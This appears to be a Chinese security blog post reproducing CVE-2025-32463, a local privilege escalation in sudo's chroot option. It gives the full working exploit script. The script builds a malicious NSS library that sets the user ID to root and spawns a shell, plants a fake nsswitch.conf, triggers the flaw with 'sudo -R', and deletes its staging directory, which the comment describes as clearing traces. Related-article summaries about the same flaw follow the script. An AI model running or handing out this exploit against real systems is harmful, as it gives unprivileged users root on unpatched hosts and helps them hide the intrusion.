CVE-2025-32463漏洞复现

最新推荐文章于 2026-06-20 12:25:33 发布
原创 最新推荐文章于 2026-06-20 12:25:33 发布 · 357 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全

CVE-2025-32463漏洞复现

影响范围:1.9.14 <= Sudo版本 <= 1.9.17

exp:

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?} ##清理痕迹

测试系统:

image-20250707094340812

sudo版本:

image-20250707094407462

写入exp,并赋予执行权限,执行脚本:

image-20250707095029632

Stack0verf1ow
关注
CVE-2025-32463(Linux提权)
墨痕诉清风的博客
07-14 377
漏洞前置介绍1:sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具漏洞前置介绍2:chroot 是 Linux 系统中用于更改进程根目录的命令,通过指定新根目录来限制用户访问权限,常用于安全隔离、系统恢复和软件测试等场景。漏洞简介:Sudo 1.9.14+ 版本存在漏洞:它在切换环境(chroot)后过早解析路径,导致攻击者能通过伪造/etc/nsswitch.conf等文件,诱骗Sudo加载恶意库(如libnss_xxx.so)。
漏洞复现】Linux sudo chroot(CVE-2025-32463)本地提权漏洞
李同學AI安全
08-15 429
Linux sudo chroot权限提升漏洞CVE-2025-32463)影响Sudo 1.9.14至1.9.17版本,允许低权限用户通过特制chroot环境加载恶意动态库,以root权限执行任意代码。攻击者可通过构建恶意环境实现权限提升,测试在Docker和本地环境获得root权限。建议用户立即升级至Sudo 1.9.17p1或更高版本,各主流Linux发行版已提供安全更新补丁。
CVE-2025-32463复现
hcja666的博客
07-09 1621
CVE-2025-32463是Linux系统中Sudo工具的高危本地权限提升漏洞,主要影响1.9.14至1.9.17版本。该漏洞源于Sudo的“-R(–chroot)”选项在实现上存在缺陷,即便攻击者是本地无特权用户且未配置任何sudoers权限规则,也能利用这一漏洞:通过构造恶意目录,并在其中伪造/etc/nsswitch.conf文件,诱导Sudo在处理chroot操作时加载恶意动态库,最终以root权限执行任意代码。
CVE-2025-32463深度解析——低用户极易、快速提权
Lucky小小吴的小屋
07-05 958
CVE-2025-32463,sudo 1.9.14+ 版本存在漏洞:它在切换环境(chroot)后过早解析路径,导致攻击者能通过伪造/etc/nsswitch.conf等文件,诱骗Sudo加载恶意库(如libnss_xxx.so)。无需特殊权限即可获得root权限
紧急预警!Linux Sudo 曝高危漏洞,数亿服务器面临 “一键提权” 风险
easylife206的专栏
07-02 2916
Stratascale网络研究部门(CRU)发布的最新安全公告显示,Sudo中存在CVE-2025-32463CVE-2025-32462。CRU表示:"该漏洞使sudoers规则中的主机名部分失效,因为用户可以在评估规则时自行设置要使用的主机"。stratascale在公告中表示:"攻击者可利用sudo的-R(--chroot)选项以root身份执行任意命令,即使这些命令未列在。这些潜伏在全球最受信任的命令提权工具中的缺陷,能让攻击者绕过配置保护措施,即使被明确拒绝访问也能将权限提升至root。
【高危漏洞CVE-2025-32463:Sudo chroot 本地提权漏洞的技术细节深度剖析
athink_cn的博客
07-01 2044
最新高危漏洞:Sudo中的一个高危本地提权漏洞CVE-2025-32463),该漏洞存在于Sudo的chroot功能中,可允许任何本地低权限用户在无需配置Sudo规则的情况下,将权限提升至root。
CVE-2025-32463的解析(附poc及其解析)
HloveJ6的博客
07-02 2113
``-R woot→ 切换根目录至当前目录下的woot/执行命令woot(此处woot可不存在,因为漏洞点在于执行前会加载 NSS**触发流程:**Sudo 以 root 权限进入 chroot(此时路径为攻击者可控的woot/在中配置优先使用/woot1337NSS。glibc 在解析用户信息时加载可控路径。恶意动态库被加载,执行woot()提权并启动以 root 权限运行。
CVE-2025-32463本地提权漏洞分析复现
qq_70248045的博客
08-12 777
CVE-2025-32463 是 Linux 系统中 Sudo 组件的一个高危本地提权漏洞,涉及 chroot 功能的安全缺陷。该漏洞允许本地低权限用户通过特制的恶意 chroot 环境触发动态库加载,从而以 root 权限执行任意代码。
CVE-2025-32463漏洞原理及其复现步骤
qq_61972142的博客
11-14 1176
CVE-2025-32463原理及其复现步骤
Linux Sudo 提权漏洞CVE-2025-32463漏洞复现及详细分析
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
10-27 1324
摘要: CVE-2025-32463是Linux sudo工具的高危本地提权漏洞(CVSS 9.3),影响1.9.14-1.9.17版本。漏洞源于--chroot选项的路径解析缺陷,攻击者可构造恶意NSS动态库,在权限检查前以root权限执行代码。复现步骤包括创建含伪造nsswitch.conf的chroot环境,编译恶意动态库并触发漏洞。官方已发布1.9.17p1修复版本,建议立即升级或禁用chroot功能,同时加强权限监控。该漏洞默认配置即可利用,主流发行版均受影响,需紧急处置。
Linux sudo chroot本地提权漏洞(CVE-2025-32463)复现
Neolock的博客
07-14 849
Linux sudo chroot权限提升漏洞(CVE-2025-32463)分析 摘要: 该漏洞影响sudo 1.9.14至1.9.17版本,允许本地低权限用户通过构造恶意chroot环境,利用动态库加载机制获取root权限。攻击者可在指定根目录下创建伪造的/etc/nsswitch.conf文件,诱使sudo加载恶意共享库。漏洞源于sudo在新版本中过早解析chroot环境路径。已披露PoC证明可通过该漏洞获得root shell。防御措施是升级至修复版本,旧版本(≤1.8.32)不受影响。
Linux sudo与chroot组合漏洞CVE-2025-32463:本地提权原理与复现分析
最新发布
weixin_30920513的博客
06-20 311
Linux系统中的权限管理机制是系统安全的核心基础,其中sudo和chroot是两个关键工具。sudo通过setuid机制实现权限提升,允许授权用户以root身份执行特定命令;chroot则通过改变进程的根目录来创建文件系统隔离环境。然而,当两者结合使用时,可能因文件描述符管理不当而产生安全边界突破风险。这种漏洞本质上属于权限边界逃逸问题,在容器安全、系统加固等领域具有重要研究价值。CVE-2025-32463正是这类漏洞的最新实例,它利用sudo执行chroot时文件描述符的继承特性,通过/proc/se
Linux sudo 本地提权漏洞(CVE-2025-32462、CVE-2025-32463) 复现+验证poc
qq_45770644的博客
07-03 1874
漏洞源于sudo的-h(--host)选项存在缺陷,该选项本应与-l(--list)配合使用来查询远程主机权限,但实际未严格限制其仅用于查询功能。Sudo是Linux系统中常见的高权限命令行工具,它允许授权用户根据系统安全策略,以超级用户(root)或其他用户身份执行命令,广泛用于实施最小权限原则,让用户无需共享root密码即可完成需要提升权限的管理任务,并在系统日志中生成审计记录。请注意,在进行任何系统更新或配置更改之前,建议备份重要数据,并在测试环境中进行充分的测试。首先,攻击者需为本地低权限用户;
CVE-2025-32462-Linux sudo本地提权漏洞复现
selecthch的博客
07-02 3979
Linux 是一个免费开源的类Unix操作系统,广泛应用于服务器、嵌入式设备和云计算平台。sudo 是 Linux 系统中管理权限的核心工具,允许授权用户临时获取 root 或其他用户权限执行命令,既保障系统安全又便于操作审计。近日,Linux sudo 工具公开存在两个紧密关联的本地提权漏洞CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户权限提升至权限。
CVE-2025-32463漏洞:sudo权限提升漏洞全解析
欢迎来到我的博客
07-23 1339
漏洞存在于Sudo 1.9.14-1.9.17版本,允许普通用户通过恶意构造的chroot环境加载伪造动态库,以root权限执行任意代码。漏洞利用条件包括本地用户权限和未禁用chroot功能的系统配置。公开的PoC脚本通过编译恶意库、劫持NSS机制触发漏洞,成功提权。建议升级Sudo至1.9.17p1+或禁用chroot功能。此漏洞暴露了权限切换设计的缺陷,需加强路径验证和动态库加载隔离。维护者最终弃用chroot功能,因其安全缺陷难以根治。
不容小觑的威胁:CVE-2025-32463 Linux提权漏洞,轻松利用却要紧急修复
didiplus
07-06 906
Linux系统发现高危漏洞CVE-2025-32463,影响sudo 1.9.14至1.9.17版本,攻击者可利用chroot功能缺陷通过特定环境变量获取root权限。漏洞复现方法已公开,可通过简单命令检测系统是否受影响。建议用户立即升级至sudo 1.9.17p1或更高版本,各主流发行版均已提供安全补丁。文章还提供了Docker环境下的测试方法及修复命令,并推荐了相关安全加固内容。
sudo本地提权漏洞CVE-2025-3243)
ubaichu的博客
07-03 502
Sudo 从 ​​1.9.14 版本​​开始修改了 chroot 功能的实现逻辑:在解析 sudoers 规则​​之前​​,先通过 pivot_root() 和 unpivot_root() 函数临时切换根目录至用户指定的路径(如 sudo -R /web)​​执行上下文​​:Sudo 进程本身以 ​​root 权限​​运行,因此恶意代码直接获得 root 权限,​​绕过 sudoers 规则验证​​。​​__attribute__((constructor))​​:确保库被加载时自动执行提权代码。
逆天提权漏洞CVE-2025-32463,嘎嘎好使,速来复现
Liyu_6618的博客
09-26 258
漏洞简介:Sudo 1.9.14+ 版本存在漏洞:它在切换环境(chroot)后过早解析路径,导致攻击者能通过伪造/etc/nsswitch.conf等文件,诱骗Sudo加载恶意库(如libnss_xxx.so)。也就是说,只要是这两年安装的Linux主机,近期内不进行更新,符合条件全部可以梭哈,漏洞影响范围还是比较广的,而且,大家都知道的,很少人更新系统的,嘿嘿。漏洞前置介绍1:sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具。
CVE-2025-32463-Linux sudo本地提权漏洞
selecthch的博客
07-02 887
CVE-2025-32463 Linux sudo 本地权限提升漏洞存在于 sudo 的 chroot 功能中,当加载目标位置的 nsswitch.conf 配置文件时,会同时加载对应的动态库,攻击者可通过植入恶意动态库使非 sudoer 组用户获取 root 权限。近日,Linux sudo 工具公开存在两个紧密关联的本地提权漏洞CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户权限提升至 root 权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值